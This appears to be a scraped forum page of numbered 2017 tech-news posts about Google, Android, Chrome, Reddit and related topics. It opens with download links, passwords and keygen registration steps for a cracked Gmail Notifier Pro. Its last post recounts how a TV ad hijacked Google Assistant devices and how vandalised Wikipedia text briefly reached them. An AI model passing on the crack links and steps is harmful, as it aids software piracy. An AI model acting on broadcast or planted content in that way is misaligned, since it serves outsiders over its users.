Site: http://95.141.193.17 Sharecode: /noload2/files/061/Gmail.Notifier.rar Usrname: rsload.net Pwd: rsload.net Noy medicine - shared by Siddharta N.B. - shared by Siddharta If you're looking for ConfigDat.xml >>> open run (Windows logo + R) and type: %appdata%\GmailNotifierPro Then replace with keygen registration <RegisteredUser><Name>XXXXX YYYYYY</Name><EMail>[email protected]</EMail><RegistrationCode>4ACXXXXXXXXXXX3EC1</RegistrationCode></RegisteredUser> Note: The xxxx (yyyyy)is personal data or names My Crack Gmail Notifier Pro 5.3.5 - by bb2018: Site: https://www.upload.ee Sharecode[?]: /files/7008428/Crack-Gmail_Notifier_Pro_5.3.5_.rar.html
  13. Google, Facebook and Twitter sued for San Bernardino terrorist attack Social media companies Facebook and Twitter, as well as Google, are being sued for allegedly enabling ISIS to spread its extremist messages ahead of the San Bernardino attack of 2015. The families of three victims are behind the lawsuit, which claims that these companies aided and abetted the terrorist attacks and are, therefore, liable for wrongful death, reports the Los Angeles Times. "Even if Farook and Malik had never been directly in contact with ISIS, ISIS' use of social media directly influenced their actions on the day of the San Bernadino massacre," reads the lawsuit, referring to Syed Rizwan Farook and Tashfeen Malik. The two were known ISIS supporters and pledged their allegiance to the group on Facebook ahead of the attack. The main idea behind the lawsuit is that because Facebook, Twitter and Google's YouTube allow everyone, including ISIS members, to post on their platforms, they are somehow at fault for indoctrinating the couple. A flawed and dangerous idea This seems like the type of lawsuit that will get thrown out quite quickly, mainly because there are billions of people using social media. Facebook is heading towards the 2 billion milestone, Twitter has over 315 million monthly users and Google is probably used by most people with Internet access, except for those where other similar tools are available and locally promoted, like China. YouTube, for its part, doesn't necessarily have a number of users who view content, but it does release the number of hours watched by users every month - 3.25 billion. Among these billions of people who use three of some of the most popular tools on the Internet, there are some bad seeds, of course, including ISIS members and other extremists. Most of these people are aware of ISIS and haven't gone to the dark side just because they exist and promote their content online. 
And for the record, their content does get removed and their accounts shut down. The companies, logically, deny liability and say that it's a tenuous and potentially very dangerous chain of blame that led to them being sued. Basically, any social network can be blamed for terrorism around the world simply because the attackers may have had the smallest connection to the platform. That idea is deeply flawed. Source
  14. In the last five months, Google’s OSS-Fuzz program has unearthed over 1,000 bugs in 47 open source software projects, and it’s ready to integrate even more of them. Fuzzing open source Software flaws can end up creating security vulnerabilities, and undermine the security of the open source foundation of many apps, sites, services, and networked things. Launched in December 2016, OSS-Fuzz aims to provide continuous fuzzing for select core open source software. “OSS-Fuzz’s goal is to make common software infrastructure more secure and stable by combining modern fuzzing techniques with scalable distributed execution,” Google explained. “OSS-Fuzz combines various fuzzing engines (initially, libFuzzer) with Sanitizers (initially, AddressSanitizer) and provides a massive distributed execution environment powered by ClusterFuzz.” The program has been a success So far, OSS-Fuzz has found a total of 264 potential security vulnerabilities: 7 in Wireshark, 33 in LibreOffice, 8 in SQLite 3, 17 in FFmpeg – and the list goes on. “Fuzzing not only finds memory safety related bugs, it can also find correctness or logic bugs,” Google’s engineers noted. “Once a project is integrated into OSS-Fuzz, the continuous and automated nature of OSS-Fuzz means that we often catch these issues just hours after the regression is introduced into the upstream repository, before any users are affected.” Pushing for greater adoption of fuzzing in software development Google wants even more open source projects to reap the benefit of fuzzing, and has put out a call for more projects to participate in the program. This time, though, there’s added incentive. “Combined with fixing all the issues that are found, this is often a significant amount of work for developers who may be working on an open source project in their spare time. 
To support these projects, we are expanding our existing Patch Rewards program to include rewards for the integration of fuzz targets into OSS-Fuzz.” For now, only software projects that have a large user base and/or are critical to global IT infrastructure need apply, and they can rack up to $20,000, depending on the “quality” of their fuzz targets. Article source
  15. Google's UI for Fuchsia Last year in August, Google was rumored to be working on a new operating system that could one day replace Android. Now, ArsTechnica has come across images that reveal the UI for the new OS and it appears that it won’t be based on Linux. Both Android and Chrome OS are based on Linux, but it seems that Fuchsia will be built on a new Google kernel, one that carries the name Magenta. The recent images reveal Google’s progress on the new OS, showing that a user-interface was added, together with a card-based design. The user interface carries the name Armadillo and will serve as “the default system UI for Fuchsia”, as it was built on Google’s Flutter SDK, which is used for developing cross-platform code that runs on multiple OSes like Android, iOS and even Fuchsia. This means that Armadillo can be compiled and run on an Android device. Fuchsia OS is created for smartphones and tablets The images and the video by Kyle Bradshaw at Hotfix show that Fuchsia is designed for both smartphones and tablets, incorporating a card-based system for managing various apps. Users will be able to drag cards in split-screen or tabbed interface mode, while some suggestions similar to Google Now can also be provided. Armadillo UI for Fuchsia OS The images also seem to suggest that Fuchsia will allow users to run up to four apps at once, making it much easier to multitask on smartphones. In addition, Fuchsia resembles Android in some respects; tapping on an image would bring up a menu that’s very similar to Android’s Quick Settings. The report also mentions that there’s no real evidence that Fuchsia will actually replace Chrome OS or Android entirely. The move to another operating system surely implies a great deal of time and effort, while Fuchsia seems to be at the early stages of development now. Google is expected to host its annual Google I/O event this month and perhaps the company will shed some light on this project then. 
But the tech giant could also choose to stay silent and only reveal Fuchsia when more progress has been made. ArsTechnica seems to suggest that Fuchsia could see the light of day in 2020. Source
  16. Google Project Zero's security researchers have discovered another critical remote code execution (RCE) vulnerability in Microsoft’s Windows operating system, claiming that it is something truly bad. Tavis Ormandy announced during the weekend that he and another Project Zero researcher Natalie Silvanovich discovered "the worst Windows remote code [execution vulnerability] in recent memory. This is crazy bad. Report on the way." Ormandy did not provide any further details of the Windows RCE bug, as Google gives a 90-day security disclosure deadline to all software vendors to patch their products and disclose it to the public. This means the details of the new RCE vulnerability in Windows will likely be disclosed in 90 days from now even if Microsoft fails to patch the issue. However, Ormandy later revealed some details of the Windows RCE flaw, clarifying that: The vulnerability they claimed to have discovered works against default Windows installations. The attacker does not need to be on the same local area network (LAN) as the victim, which means vulnerable Windows computers can be hacked remotely. The attack is "wormable," meaning it is capable of spreading itself. Despite not even releasing any technical details on the RCE flaw, some IT professionals working for corporates have criticized the Google Project Zero researcher for making the existence of the vulnerability public, while Twitter's infosec community is happy with the work. This is not the first time Google's security researchers have discovered flaws in Microsoft’s products. Most recently in February, Google researchers disclosed the details of an unpatched vulnerability impacting Microsoft's Edge and Internet Explorer browsers. Microsoft released a patch as part of its next Patch Tuesday but criticized Google for making all details public, putting millions of its Windows users at risk of being hacked. 
Microsoft has not yet responded to the latest claims, but the company has its May 2017 Patch Tuesday scheduled tomorrow, May 9, so hopefully, it will include a security patch to resolve this issue. Source
  17. Everyone knows the Google Search Engine. It is only used for finding web pages on a specific topic, right? Wrong, there are many Google Search Tricks or Hacks that allows you to do much more than just search the web, do homework and assignments. I have prepared a list of the best Google Search Tricks that will open your mind to a world of endless possibilities. Learn how to also use Google for fun, get more refined searches and other cool stuff. Calculate Dinner Tip As far as Google Search Tricks go, this one is the most useful. When having dinner at your favorite restaurant, it is important to know what tip you should leave after. With this trick, you can quickly calculate the tip you should leave after dinner. To start the Tip Calculator, type tip calculator in the Google Search box and press Enter. Using the Tip Calculator is straight forward. In the Bill box, enter the total bill amount. Then, in the Tip % box, select the tip percentage and finally, if the bill will be shared between a number of people, in the Number of People box, select the number of people sharing the bill. Google Tip Calculator in action When all required information is entered, the Google Tip Calculator will display the Tip and Total amount you should pay. It will divide these amounts between the people sharing the bill as specified. Please note, it seems like there is no way to change the currency of this Tip Calculator. 🙁 Currency Converter This is one of the Google Search Tricks I use the most. To quickly convert between currencies, in the Google Search box, type the amount you want to convert, followed by the currency code, then to, and again followed by the currency code you want to convert to. For example, to convert from 25 Dollars to Rand, type 25 USD to ZAR in the search box and press Enter. If you are unsure about the currency codes to use, simply type currency converter in the search box and press Enter to open the Google Currency Converter. 
Google Currency Converter in action. Timer Boiling eggs? Want to perform a task in a certain time frame? Quickly set a timer in Google. Just type set timer followed by the time span you want in the Google Search box. For example, to set a timer for 10 minutes, simply type set timer 10 minutes in the search box and press Enter. Google Timer in action Exact Sunset and Sunrise time From all the Google Search Tricks this is the one you will use the least. Google can tell you the exact Sunset or Sunrise times. To see the exact Sunrise time, simply type sunrise followed by your country in the Google Search box. Or, to see the exact Sunset time, type sunset followed by your country in the search box. For example, to see the exact sunrise time in South Africa, type sunrise South Africa in the search box. Furthermore, you are not limited to your country or even limited to a country. For example, to see the exact sunrise for a specific city, type sunrise followed by the city and then followed by the country. Like, sunrise Johannesburg South Africa. Get exact Sunrise or Sunset time from Google Get the Definition of a Word Looking to define a particular word? Simply type define followed by the word you want to define in the Google Search box and press Enter. For example, type define programming to get the definition of programming. Get the Definition of a particular Word. Furthermore, you can click on the Translations, word-origin, and more definitions link to quickly translate the word or view the origin and extended definitions of the specified word. Google Calculator The humble Calculator needs no introduction. Performing calculation straight in Google is one of most useful Google Search Tricks available. To open the Google Calculator, type calculator in the Google Search box and press Enter. Also, perform quick calculations, by typing the calculation straight into the search box. For example, to get the square root of 888, type sqrt(888) in the search box and press Enter. 
Google Calculator in action Get the Weather To get the weather in a city, simply type weather followed by the city name in the Google Search box and press Enter. For example, weather Johannesburg. To further improve your search, try adding the country behind the city. Like, weather Johannesburg South Africa. Google Weather in action Search within a Particular Website The next few sections are all about refining your search. These are the oldest Google Search Engine Tricks, and some would consider them more important than the previously mentioned ones. Because of the huge amount of information available on Google, it is important that you learn how to refine your searches to find what you are looking for. You can limit your search to a specific website in Google by typing site: followed by the website’s URL you want to search and then the term you want to search for in the Google Search box. For example, to find all pages related to Complete Internet Repair on Rizonesoft, type site:rizonesoft.com Complete Internet Repair in the search box and press Enter. Search for all pages related to Complete Internet Repair on Rizonesoft This trick is especially useful when a website does not have its own build in Search Engine, but you need to find something specific to that website. Search by File Type Also, to search for a specific file type, simply type filetype: followed by the type of file and then the search term in the Google Search box. For example, type filetype:PDF Windows 10 Guide in the search box and press Enter, to find all the PDF Documents (Books) related to Windows 10. Go to File types indexable by Google to find out more about the file types you can search for. Search for Specific File Type in Google. Find Songs by Your Favorite Artist or Band Also, to quickly find songs by your favorite artist or band, just type Songs by followed by your favorite artist’s name in the Google Search box and press Enter. 
For example, type Songs by Linkin Park in the search box to view an extensive list of songs by Linkin Park. Click on a song to go to the respective song’s YouTube link. Search for Songs by Linkin Park in Google. Find Movies Apart from finding songs by an artist, you can also find specific movies using various filters. For example, type movies with, followed by your favorite actor into the Google Search box and press Enter. Like, movies with Keanu Reeves to display a list of all the movies starring Keanu Reeves. Also, type movies followed by a genre, for example Action or year. The genre and year can also be used together. For example, type movies action 2017 in the search box to get a list of the most popular action movies released and due for release in 2017. Action Movies 2017 on Google Pac-Man You can play Pac-Man on Google. It is a mini version of the game and was originally an animated logo for the game’s 30th anniversary on May 22, 2010. From all the Google Search Tricks, this one is my favorite. To start Pac-Man in Google, type pacman in the search box, press Enter and click on Click to Play. Google Pac-Man Article source Fun Things to do With Google Search or the “Hidden Google Tricks”
  18. Google and Microsoft are becoming fiercer rivals in education Microsoft’s new education push with Windows 10 S and the Surface Laptop is specifically aimed at slowing down the growth experienced by Google’s Chrome OS and Chromebooks, which have more or less conquered the education market in the last couple of years. And while Microsoft’s recent product unveilings were announced with much fanfare and received with enthusiasm by fans across the world, Google says it has absolutely no reason to worry about the strategy embraced by its Redmond-based rival. In fact, Google’s Prabhakar Raghavan, the vice-president in charge of G Suite, says the search company is pleased to see its approach being adopted by others, adding that the education market is the only one to benefit from the increasing competition here. “I'm happy to see a validation of the approach we've taken,” he was quoted as saying after Microsoft’s press event. “What educational institutions have demanded is simplicity. It's a real test tube for all of us, whether it's Microsoft or any of us, right.” Students are the ones building our future Prabhakar Raghavan continued with a message that was also reiterated by Microsoft’s Panos Panay during the May 2 press conference: technology shouldn’t stand in the way of students, as they are the ones who are trying to build the future. “Because kids do things in amazing ways where you or I would never expect. So here's one of the things we've learned in a study of kids as we were developing all our tools for classrooms, right. We would put a Chromebook in front of a kid, they would whip out their phone and write their essay. We said 'no no no, there's a keyboard there, you can use it,' and they still write the essay there,” he said. “They said 'we'll use the keyboard to touch up the formatting, but it'll be much faster here,' right. This is something we consistently learned when we looked at pre-teens ... 
these kids are really forerunners, the vanguards of human evolution, in some sense, and so it's great to see that some of the approaches we've taken, but I think the world is going to keep evolving and it's a scramble for us to keep up with what people are going to do.” Microsoft is trying to make its Windows 10 S devices as affordable as Chromebooks, so the cheapest models will be priced from $189. Furthermore, buyers will be allowed to upgrade devices to full Windows 10 Pro from the Windows Store. At the same time, Microsoft is also building its own Windows 10 S device called the Surface Laptop, but in this case the company is going for premium quality and price, giving more space to partners to dominate this market. Source
  19. How well do you know your Android device? Here are some of the hidden Android secret codes. Since most hidden menus are manufacturer specific, there’s no guarantee that they’ll work across all Android smartphones, but you can try them out nevertheless on your Samsung, HTC, Motorola, Sony and other devices. Be advised, though, that some of these can cause serious changes to your device’s configuration, so don’t play with something that you don’t fully understand. You can find more of these spread across the internet, and they’re usually very handy to have, even if just to show off your geekiness to your social circle. Update x1: More codes! Source : Redmondpie
  20. Earlier this week, Google unveiled a new version of Google Earth, an app that was considered amazing when it launched in 2001 but hadn’t really evolved in the same way that Google’s other technologies have. Now, thanks to this latest update, Google Earth is replete with 3D imagery, curated video content, and other features that will either make you want to book a trip to some far-flung part of the world or just appreciate the Earth right from your own latitude and longitude coordinates. Or maybe both. Here are five things to try with the new Google Earth, which runs in Chrome on desktop and on Android for mobile users: ENJOY 3D MAPS In earlier versions of Google Earth, certain buildings could be viewed in 3D, provided you checked off “3D Buildings” in the Layers portion of the app. But in the newest release of Google Earth, you can view, well, the whole world in 3D. When you search for a location, a clickable 2D/3D button appears on the lower right-hand corner of the screen, giving you a quick and easy way to look at your destination in another dimension. HAVE ANOTHER DOSE OF DAVID ATTENBOROUGH If Planet Earth II wasn’t enough to satisfy your love of nature, or you just can’t get enough of David Attenborough’s remarkably dignified narration of a lizard getting chased by hundreds of terrifying snakes, check out “Epic Hunts Caught on Camera.” Thanks to a partnership with BBC Earth, Google Earth now offers a series of short video clips narrated by Attenborough, which play in YouTube along the righthand side of the usual Earth view. If chimpanzees or underwater expeditions are more your thing, there’s also content from primatologist Jane Goodall and marine biologist Dr. Sylvia Earle. SEE HEMINGWAY’S HANGOUTS Ever want to see the places where Ernest Hemingway wrote his most important and influential works, ones that are second only to this blog post? 
Within the new “Voyage” tab in Google Earth, you can take a virtual tour of the Galapagos islands, the Samburu National Reserve in Kenya, and other UNESCO World Heritage sites; as well as cultural imprints like Hemingway’s hangouts, architecture by Zaha Hadid, and global perspectives on the different structures we call “home.” GET LOST Did you know that before Europeans came to North America, so-called Mississippians “had built a great city surrounded by huge earthen pyramids and a Stonehenge-like structure made of wood to track the movements of the stars”? And that it’s still visible in Illinois? Me neither, but the new Google Earth highlights this structure, along with eight other architectural feats, forgotten lands, or relics of an ancient world. Go to Google Earth -> Voyage -> History -> Lost Civilizations from Above to find them. FEEL LUCKY Google has ported its “I’m feeling lucky” button from its search engine to the new Google Earth, and it’s a glorious way to distract yourself at work or plan your next spontaneous trip. Source
  21. Google has removed a feature of the Android operating system that has been used in the past in ransomware attacks. Starting with Android O (8.0), set to be released in the fall of 2017, Google plans to deprecate the following window types: TYPE_SYSTEM_ALERT, TYPE_SYSTEM_ERROR, and TYPE_SYSTEM_OVERLAY. These are special "system" windows that are shown above any app on the user's screen. As you'd imagine, this is highly valued realty for ransomware developers, who often aim to obtain permissions to show content via these windows. Once they manage to obtain such permission, they use these windows to block the user's access to the rest of his phone and show ransom notes. Google's anti-ransomware efforts sabotaged by OEMs Starting with Android Marshmallow (6.0), Google reclassified the permissions of these system windows to the "Above dangerous" class. Previously, Android had only two permission classes: Normal and Dangerous. The difference between the two is that the Android OS itself can grant apps access to Normal permissions (adjusting timezone, access mundane sensors, etc.), while the user has to grant access to Dangerous permissions himself. For Above Dangerous permissions, requesting apps can provide instructions and the user has to go to an Android settings section, on his own, to grant access to the SYSTEM_ALERT_WINDOW permission, similar to how permissions are granted for Accessibility features and Device Administrators, also two other features often abused by ransomware. Dinesh Venkatesan, Principal Threat Analysis Engineer, says this didn't actually stop Android malware and ransomware authors, who just found various workarounds to get that permission. It also didn't help that certain Android phone manufacturers didn't move this permission in the Above Dangerous category in their modified Android distributions, nullifying Google's work. 
Google adds button to shut down abuse apps

Now, with Android O, for which Google released a developer preview at the end of March, Google has taken this choice away from OEMs and has deprecated three types of system windows often used by ransomware authors. This means ransomware authors will need to find new ways of showing ransom notes and locking users' screens. And to make things even safer, Google is now allowing users to shut down apps that show other types of system windows. Starting with Android O, when ransomware or other malware attempts to lock users via a system window, the user can pull down the Notifications panel and shut down the app that's locking him out of his phone.

New button to shut down apps with annoying system windows, at the bottom of the Notifications panel [via Symantec]

"It should also be noted that while the new OS features should prove to be a good defense against ransomware variants that use system alert windows, they will not affect other ransomware threats such as those that constantly pop up the lock screen using user level windows," Venkatesan pointed out.

Nonetheless, despite these improvements, Google's own Android Security Report showed that malware devs usually target older versions of the Android OS, where these improvements aren't supported. It also helps that there are more devices running Android 4.x and 5.x, less secure Android versions, compared with 6.x and 7.x, meaning malware devs don't have to go through all the trouble to bypass Google's new security features to make profits. So for the time being, ransomware is going to remain a problem on Android, but most likely for users of older OS versions. Last year, with the release of Android Nougat (7.0), Google also added anti-ransomware improvements, by restricting the ability of malware to "programmatically" change device PINs and passwords.

Source
  22. Google Chrome may soon feature a built-in ad-blocker

Rumor has it that Google is actually working on a built-in ad-blocker for Chrome and, to take things a step further, may even turn it on by default for everyone. This is a bit of a surprise, considering that Google's main source of money continues to be advertising. Wall Street Journal reports, however, that Google plans to offer its own ad-blocker in Chrome, in order to target a specific type of ads, namely the ones that are particularly annoying. The list includes pop-overs, autoplaying audio and video and more. For the most part, however, Google seems to seek to cater to that group of people that even if annoyed by ads, won't seek an ad-blocker, mostly because they don't have the technical know-how to get the job done or even know that such a thing exists. According to the report, Google isn't a big fan of the deals it has to make with third-party developers, like the people behind Adblock Plus, for instance, which require paying fees so they whitelist ads by companies such as Google. Basically, while Adblock Plus is one of the most popular of its type, it doesn't just whitelist "good" ads that don't bother you too much, it also takes money for allowing various ads to go around their filters.

Potentially huge impact

Implementing an ad-blocker directly into Chrome makes sense because the browser has almost half the market share. Taking this step would stop the growth of third-party options because users will stop looking for ways to block ads by installing additional extensions. Google wouldn't be killing ads altogether. After all, that's not its intention since the thick of its money comes from this side of business. It will, however, weed out the most annoying ones, which are the ones no one wants to encounter when visiting a web page.
There is a problem, however, and it comes exactly from this particular combination - Google is an advertiser and giving the company control over what ads people can see might draw some criticism. After all, what's to stop Google from whitelisting all its ads and controlling who it blocks? Probably the company's moral compass, but that's another story. Source
  23. Reddit opens up about DMCAs

In the past year, Reddit has received 3,294 DMCA takedown notices, most of which were thrown to the garbage can. According to Reddit's brand new transparency report regarding the number of piracy takedown notices, copyright holders asked the company to take down a lot of content. Out of the 3,294 requests it received, Reddit rejected 81% of them. Reddit is clearly one of the most visited websites in the world, and rightfully so. The community-oriented platform has subreddits dedicated to pretty much everything you can think of and more are posted every day. On occasion, however, some copyright infringing material will filter through and land on its pages, much like it happens on any platform that deals with this much traffic. The transparency report the company published shows just how much attention the site is getting from copyright holders. Most times, it seems, they're bothered over nothing. "For a request to be valid, it must comply with the statutory requirements outlined in the DMCA. Each DMCA takedown notice is reviewed carefully and, in circumstances where content is actually hosted on our servers, we assess whether the existence of the content on Reddit can fall under an exception, such as 'fair use' of the copyrighted material," Reddit explains.

A different approach

Given the number of rejected DMCA notices, it's clear that Reddit doesn't just blindly remove posts linking to copyrighted content. After all, the company has previously stated that it does not believe that links generally infringe copyright, something that certainly annoyed a lot of Hollywood execs. According to Reddit's report, out of the copyright removal requests it received, they were required to remove content from the site in 610 instances, making for a 19% approval rate. When compared to Google, that's nothing. In fact, Google is flooded with millions upon millions of requests every year and its automated process has reached a removal rate of 90%.
Of course, comparing the two isn't much of a solution since there is such a big gap between the numbers, but it's still telling of the policy applied by each company. Source
  24. Google has acquired a significant piece of land in Nevada, near Reno and Tesla’s Gigafactory site, which will house a future data center, and could also prove host to a testing track for Waymo, the Alphabet-owned autonomous driving company. The purchase of the 1,210 acres in Nevada’s Tahoe Reno Industrial Center was reported by The Wall Street Journal on Monday, and follows the filing of documents detailing the transaction late last week. The purchase of land doesn’t mean Google is breaking ground on a new data center immediately; the report says there aren’t any plans in the books to start construction right away. But with increasing emphasis on its cloud-based business, it’s unlikely the company will sit idle on plans to build new data center infrastructure for long. More interesting might be the WSJ’s assertion that several people suggested Google might use the site as a future testing facility for Waymo’s autonomous vehicles. Nevada is in the process of passing legislation that could see it eventually allow self-driving tests with potentially fewer restrictions than are in place for testing in California, which might make it a good site for high-speed testing of vehicles, above the 35 MPH cap currently in place in Google’s home state. The theory that Google could use the land for testing of vehicles is based mostly on the regulatory conditions in Nevada, and its co-backing of the bill currently making its way through the legislative process, as well as the fact that the parcel of land is much larger than would be required for any single data center. Still, it’s an interesting possibility, and one that makes sense if Waymo wants to continue expanding its real-world testing capabilities. Source
  25. Burger King made waves today after it released a TV ad that purposely triggered the Google Assistant. The ad ends with a person saying "OK Google, what is the Whopper burger?"—a statement designed to trigger any Google Assistant devices like Android phones and Google Home to read aloud a description of the hamburger's ingredients. Google apparently wasn't happy with a third-party hijacking its voice command system to advertise fast food and has issued a server-side update to specifically disable Burger King's recording. Before the ad was disabled, the Google Assistant would verbally read a list of ingredients from Wikipedia. Of course the Internet immediately took to Wikipedia to vandalize the burger's entry page, with some edits claiming it contained "toenails" or "cyanide." Getting the Google Assistant to actually read one of these false edits was a tough task, since the Google Assistant gets its data from Google's search index, rather than a live query of Wikipedia. Still, according to The Verge, there was actually a brief period when the Google Assistant would read a false edit. Google's shutdown of the feature is interesting. The ad will still wake up a Google Home—the "Ok Google" phrase will light up the device, and the little lights on top will spin while it waits for the query to make a round trip to Google's servers. Google Home will no longer dutifully recite the burger's ingredient list, though. Apparently Google has made changes so that Burger King's specific recording of the phrase will no longer trigger a voice response. Instead, the Google Home just quietly goes back to sleep, without any response to the query. Having a live person ask "OK Google, what is the Whopper burger?" will still trigger a voice response, though. Android phones are a little less susceptible to inadvertent hotword triggers thanks to a feature called "trusted voice," which aims to listen only to "Ok Google" triggers from the device owner. 
Android phones also don't have "Ok Google" enabled by default, giving Burger King a smaller target area. Google is working on a voice-based user authentication scheme for Google Home, which should shut down similar hotword hijacks in the future. Google Home would be the first Google voice product to detect and differentiate between multiple user voices on the fly—a task I think even some humans would have trouble with—so the feature is taking some time. The total time the ad triggered the Assistant was about three hours. Burger King is still on the hook to run the now-defanged ad on television, but we're sure the company already got its money's worth thanks to tech articles like this one. Burger King isn't the first brand to hijack a virtual assistant, though this may be the first intentional effort. Back in 2014, a commercial for the Xbox One featuring Breaking Bad alum Aaron Paul accidentally activated people's consoles. In the spot, Paul gave the "Xbox on" command to turn on his Xbox One. The only problem: that command turned on the consoles of everyone watching the commercial at home. Source 1 Source 2 (Xbox addendum)